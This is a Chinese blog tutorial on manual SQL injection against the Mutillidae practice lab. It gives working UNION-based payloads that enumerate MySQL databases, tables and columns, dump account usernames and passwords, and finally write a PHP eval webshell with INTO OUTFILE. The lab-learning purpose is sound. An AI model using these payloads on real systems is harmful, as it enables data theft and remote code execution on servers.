手工注入 mutillidae

头像
mugbya
    阅读 3 分钟
     环境: xampp-win32-5.6.3-0-VC11        Mutillidae-2.6.19

    前言

    网上能搜到mutillidae 相关的工具注入,但是手工注入的基本没有,好像大神们都已经略过手工注入这一阶段了,没办法,刚进入的新手还是老老实实手工注入。

    这里也将搜集到的工具注入记录如下,以后用工具注入会有用的:

    准备

    mutillidae跟dvwa类似,也有安全级别,所以刚开始做手工注入的时候就将它调至最低吧:

    图片描述

    然后我们到mutillidae的注入点:

    OWASP 2013 --> ”A1 - Injection” —>> ”SQLi - Extract Data” —>> ”User Info”

    须知

    SQL注入最重要的是寻找注入点,mutillidae 这里面的注入跟别的实际场景不一样,我们知道最常见的是去url上检测注入点。 当然像mutillidae 这样的构造的用户登陆的注入点检测也很多(常用的万能密码测试?)。只是目前自己遇到的还少。

    实际操作

    寻找注入点

    在用户信息界面:单引号检测Name对应表单,结果如下:

    图片描述

    通过这张图片我们就知道后端数据支撑的数据库类型是mysql了

    我们还可以尝试是否能列出所有用户信息: ‘ or 1=1 #
    结果我们得到了所有用户信息。(图略)

    猜解查询结果集字段

    我们使用如下语句:

     ’ order by 10 #   页面出错
 ’ order by 5  #   页面无数据
 ’ order by 7  #   页面无数据
 ’ order by 8  #   页面出错

    所以猜到查询结果集的列数为 7列

    猜数据库类型,链接用户,数据库名

    先用如下语句得到哪些字段可以用来显示数据:

    ' and 1=2 union select 1,2,3,4,5,6,7 #

    如下图:
    图片描述

    然后构造语句:

    ' and 1=2 union select 1,user(),version(),database(),5,6,7 #

    然后我们就得到了如下信息

    Username=root@localhost
Password=5.6.21
Signature=nowasp

    如果只有一个字段可以显示信息的,那么我们可以用concat_ws函数方便一次性得到数据

    ' and 1=2 union select 1,concat_ws(char(32,58,32),user(),database(),version()),3,4,5,6,7 #

    得到的信息如下:

    Username=root@localhost : nowasp : 5.6.21
Password=3
Signature=4

    这下知道是mysql5以上的数据库,那么我们就可以直接利用系统库爆出一些信息

    获取所有的库名

    ' and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7 from information_schema.SCHEMATA  #

    得到的数据库名如下:

    information_schema
cdcol
dvwa
mysql
nowasp
performance_schema
phpmyadmin
test
webauth

    得到的数据库还是蛮多的,放在这儿,作为检测,这些都是可利用的信息,或许以后有用

    获取当前链接数据库下的所有表名

    ' and 1=2 union select 1,TABLE_NAME,3,4,5,6,7 from information_schema.TABLES where TABLE_SCHEMA=0x6E6F77617370 #

    其中0x6E6F77617370是nowasp的十六进制编码

    得到的表名如下:

    accounts
balloon_tips
blogs_table
captured_data
credit_cards
help_texts
hitlog
level_1_help_include_files
page_help
page_hints
pen_test_tools
youtubevideos

    这表也是蛮多的,但是一般我们只需要我们有用的表就行,目前需要的是系统用户信息表,这里看就是accounts表了

    获取字段

    ' and 1=2 union select 1,COLUMN_NAME,3,4,5,6,7 from information_schema.COLUMNS where TABLE_NAME=0x6163636F756E7473 #

    其中0x6163636F756E7473是accounts的16进制编码

    得到的字段如下:

    cid
username
password
mysignature
is_admin
firstname
lastname
USER
CURRENT_CONNECTIONS
TOTAL_CONNECTIONS

    获取字段值

    ' and 1=2 union select 1,username,password,mysignature,5,6,7 from accounts#

    你会发现这跟之前的万能密码爆出来的东西一样。 这大概就是mysql 5的注入获取数据的过程,

    获取websehll

    然后你需要找后台,找上传点,上传你的小马。或者试下下面简单快捷方法,写入一句话(需要你有写入权限)

    ' union select 1,'<?php eval($_POST[cmd]);?>',3,4,5,6,7 into outfile 'D:\\xampp\\htdocs\\mutillidae\\coofig.php' #
    web安全sql注入
    mugbya
    1.2k 声望41 粉丝

    时间永远分岔,通往无数未来

    « 上一篇
    SQL注入基础
    下一篇 »
    MCIR下注入学习记录

    引用和评论

    推荐阅读
    头像
    flowable 中级 - 1. 多任务实现会签、或签

    mugbya1阅读 13.6k

    头像
    在 Docker 里运行 Microsoft SQL 服务器

    注销阅读 1.5k

    头像
    Burp Suite Professional 2024.8 发布下载,新增功能概览

    sysin阅读 603

    头像
    【工具推荐】TPscan (最新版本) - 一键ThinkPHP漏洞检测getshell

    0day漏洞文库阅读 598

    头像
    【工具推荐】0x7eTeamTools v1.2(最新版) -全能的渗透测试工具,一键getshell

    0day漏洞文库阅读 573

    头像
    【漏洞分享】2018年-2024年HVV 6000+个漏洞 POC 合集分享

    0day漏洞文库阅读 469

    头像
    【工具推荐】FindEverything(最新版) - 内网渗透必备 敏感文件搜索工具

    0day漏洞文库阅读 420

    0 条评论
    得票最新